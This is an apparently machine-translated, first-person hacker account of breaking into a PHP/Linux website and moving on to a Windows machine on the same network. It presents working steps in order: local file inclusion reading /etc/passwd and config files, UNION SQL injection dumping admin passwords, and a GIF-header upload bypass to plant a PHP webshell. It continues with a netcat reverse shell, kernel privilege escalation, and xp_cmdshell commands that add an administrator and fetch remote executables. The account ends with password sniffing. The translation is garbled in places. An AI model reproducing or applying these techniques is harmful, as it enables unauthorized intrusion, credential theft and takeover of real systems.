Take a look at the website. php Linux Apache MySQL composition. It seems that there is another database that I can't decide. First, we start from
I started to understand the structure of the entire site. I took out wwwscan. Because I often detect foreign sites, I have collected a lot of sensitive directory files, and so on, of course, the software author.
It also collects a lot of useful results. The approximate returned directory is
/Admin/
/Config/
/News/
/News/newadmin/
/News/newadmin/test. php
/Admin/test. php/info. php
Omitted ..
This is useful, because what I want most is the background. At least the Administrator's user and pass are available.
Admin directory access prompt 403 newadmin came out with a login page. Sorry, please go to Google.
Site: test.com inurl: PHP
Site: test.com Admin
Site: test.com Login
Site: test.com filetype: PhP | ASP | JSP | aspx | JSP | the result is only PHP and most of the sub-sites are composed of HTML.
I found some information and found some suspicious notes about the name of the website script. There are some rare pages. You may feel this way in seach.
Open the tool box. There is a fuckgoogle.exe that can collect all the URLs found by Google into an HTML for you. There are many links. You can open this page in the ad injection tool for AD scanning.
Even if ad is not mysql-based. at least clearly the difference between and 1 = 1 and 1 = 2. after having put ad for 10 minutes, I checked the result. no fun... discard Google. {Note: You must observe it with patience}
Okay. since the Admin directory 403 is started from him. I guessed a few logon pages. no RP problems. I ran it at wwwscan .. khan. abandon...
News system, news system .. why are you a news system. at least I can run it with snow in the background. even if it's not scientific, it's luck... you have finished running. {Note: Of course you can do other tasks in this process)
I am afraid that authentication is a problem with the background. search around. never found. there is a vote. go in and have a look... who and who % xx. get 'error. PHP sends the path to me. and 1 = 2 the returned result is normal. it is no different from 1 = 1. khan. come back
/**/AND/**/1 = 2 is the same as everyone else when I am farting. stop searching .... find .. suddenly I saw this URL read4.php? Files = include/hellokitty.html connection. If the connection fails, the prompt "hellokitty.html" appears.
Warning: smarty error: unable to read resource: "include" in/home/httpd/html/libs/test. php on line 1095
Hey, it's amazing. Then I randomly found a picture on their site and submitted read4.php? Files = ../img/bar_logo.jpg ga. What is the returned result? \ U0010jfif \ u0001 \ u0002dd? \ U0011ducky \ u0001 \ u0004 <? \ U000eadobed \ u0001 omitted ....
OK. Continue. Submit read4.php? Files = ../read4.php returns
<?
Require '../libs/xxxx ****** (false). php ';
Include 'sqlfunc _ csm2.inc ';
Session_start ();
... Omitted
Progress continues. Submit read4.php? Files = ../sqlfunc_csm2.inc
Of course MySQL user & pass is obtained. The premise is not root.
Okay. Although I haven't found at least found an alternative load_file. No matter 3721, continue the attack !!!
Read4.php? Files = ../etc/passwd
Of course, I found several users with/bin/bash using the MySQL password to try SSH and the result failed.
Don't worry. Come back. We have to find something. It took an hour ....
I still haven't found it yet. I can't help but use Maxthon to check the source code. It's just a form. Search for PHP. I accidentally found a very strange page. I haven't seen it in Google. It seems to be called. Bored.
Specifically.../DJ? MSB = 908 good guys open it... back to let me sweat down... just a 3456. Finally I found this page to count the number of user visits.
An error occurred while adding '. 1 = 2 1 = 1. ^_^ hard work. I am paying attention to my attention. I am directly paying attention to it.
And 1 = 2/**/Union/**/select/**/1, 2
Okay, return to normal...
And 1 = 2/**/Union/**/select/**/1, user ()
Back to MySQL I just cracked. Some friends asked. You have all obtained the MySQL password. Why didn't you connect to the data into file? Eldest Brother, I hope you can see clearly. The above result is 20.
And 1 = 2/**/Union/**/select/**/1, database ()
That's right. It's the same as the brute-force library. Let's see how you are playing with you. Everything is complete. It's the Administrator account and password.
The problem arises. table Name .... this is simple. use the method of brute-force file to crack login. PHP or its post file can be found to indicate. everyone understands what I mean. continue note
And 1 = 2/**/Union/**/select/**/news_admin, news_password/**/from/**/administrator55991 (BT bar administrator is conscious)
Exposed. The password is base64 you can come to the http://makcoder.sourceforge.net/demo/base64.php to unlock. Or use the Cain additional features. Or I will give you a coding tool very useful.
Okay. I got the account password and went to the background. I edited the news and published the news. Other words are a waste of time. Of course, the upload function is available. I am happy to upload a PHP file ....
.....
Please help me. I am in trouble ..
You have to upload jpg or GIF images. I have all the thoughts of hitting the computer...
Stable and stable... continue... find a real image first. Change the suffix to. Fuck for upload !! The prompt is successful. I checked the uploaded post-upload. That's right. Yes. Fuck.
Niang Di. It turns out that only the GIF header is detected. Then, add a GIF header gif89a to the c99 header to upload !!!!
Failed !!!!!!!!!!!!!!!!!!!!!
Stable. a jsp and CGI with a GIF header are uploaded successfully, but the server does not parse the image.
A cigarette went out to breathe fresh air. When suddenly smoking, the light flashed !!!
Upload a. php Trojan with a GIF header... Wow !!!! Success. Shuang. {Note: I will not explain the specific principles of the combination of. php, PHP, and so on. You all know that there are some articles on the superhei.
Enter the password to go to webshell... now that the password is in, let's go through the sky.
This is really good. 555555. upload an nstview. php file after entering the tools option. There is a backdoor. The local machine executes nc-vvlp 520
Click Start and a shell is returned. You can start to escalate permissions. You can get the meat ....
Submission ID
Nobody.
Submit uname-
Otherwise, Apache will be used as Apache. What an idiot !!! -.-
Linux 2.4.20 xxxxxxx
In fact, this is also a coincidence. Maybe luck is good. I used BRK. C to successfully mention the meat...
BRK. C. You can go to www.milw0rm.com seach...
Start Elevation of Privilege...
$ Gcc brk. C-o BRK
$./BRK
... Omitted ....
# Sh. x. x
Okay. Continue.
NMAP-v-SS release 1.0.1/16
A lot of results are returned. There is a win machine. It may be 2 K. Linux is uncomfortable. please fix it first.
139 445 1433 3389 5900
# Netstat-
The machine is still connected to the 2 k 1433 ecstasy...
Do you remember the previous Admin directory? 403 that... I probably looked at the files in the directory and looked at them carefully. include SQL. open SQL in PHP. PHP wow/SE/se luck is really bad ..
It's Sa. But the problem is coming again... Apache + LINUX does not support MSSQL. I am a newbie and won't write PHP... I searched for good stuff on Google.
Freetds. Linux MSSQL management tool. Download and install it now
# Wget http://xx.xx.com/freetds.tar.gz
# Tar-zxvf freetds.tar.gz
# Cd freetd./configure -- prefix =/usr/local/freetds -- With-tdsver = 7.0
# Gmake)
# Gmake install (installation)
OK. Continue
# Cd Bin
#./Tsql-H prepare 1.0.9-P 1433-U sa-P xxxx98 #4 after successful logon, the system will display>
> Exec master. DBO. xp_mongoshell net user Randy XXXXX/Add
> Exec master. DBO. xp_mongoshell net localgroup administrators Randy/Add
> Exec master. DBO. xp_cmdshell FTP 12.12.12.12 | "Randy" | "121212" | "Get down.exe" | "bye" | I have omitted this... the FTP bat. everyone knows.
> Exec master. DBO. xp_cmdshell down.exe http://www.xx.com/vidc.exe vidc will be configured.
> Exec master. DBO. xp_cmdshell down.exe http://www.xx.com/vidc.ini
> Exec master. DBO. xp_cmdshell vidc.exe (run vidc.exe-P 7777 locally before execution)
> Exit
Okay. The vidc port is also mapped. link the local 127.0.0.1: 7777 to the terminal. Install Cain and start sniff.
No one cares about the server. One and a half days later, the SSH password is sniffed. Root $ * 2323 ****
The whole segment is the same account password. This is the win. In this case, the gateway account password. Ssh, and so on, let alone the database.
